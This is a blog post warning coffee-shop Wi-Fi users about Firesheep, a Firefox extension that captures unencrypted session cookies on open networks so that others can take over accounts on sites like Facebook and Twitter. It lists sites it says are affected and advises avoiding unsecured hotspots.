Pay attention my fellow readers. I know many of you travel or spend time in coffee shops and access free Wi-Fi hotspots but there is a danger lurking out there. Developer Eric Butler has created a Firefox extension called Firesheep. This free Firefox extension collects cookies that have been broadcast over an unprotected Wi-Fi network without using SSL. Say what? This means that Firesheep essentially eavesdrops on an unprotected (open) Wi-Fi connection and will capture cookies for sites such as Facebook and Twitter and allow the Firesheep user to sidejack the session. Yes I know this is old news from last October but it is still an important problem.
Let developer Eric Butler explain from his blog post:
“As soon as anyone on the network visits an insecure website known to Firesheep, their name and photo will be displayed.”
All you have to do is double click on their name in the Firesheep window and open sesame, you will be able to log into that user’s site with their credentials.
Open sesame. Yikes.
Fortunately there are limitations to the extension. It only works on an open/unsecured Wi-Fi connection. So let’s say you are sitting at Starbucks and checking your Facebook account. Someone else at that same Starbucks starts up Firesheep and scans the network. Firesheep sees your unprotected session, grabs the cookies that Facebook uses to store identifying information about you and lets the Firesheep user masquerade as you. Did I mention that you will have no idea that someone else just accessed your Facebook account?
Which sites are vulnerable? Amazon.com, Basecamp, bit.ly, Cisco, CNET, Dropbox, Enom, Evernote, Facebook, Flickr, Foursquare, Github, Google, Gowalla, HackerNews, Harvest, Windows Live, NY Times, Pivotal Tracker, Slicehost, tumblr, Twitter, WordPress, Yahoo, Yelp and probably many many other sites.
How do you deal with this? Don’t use any unprotected Wi-Fi connection. Find another coffee shop that uses a password for their WPA connection or convince your existing shop to start using a password.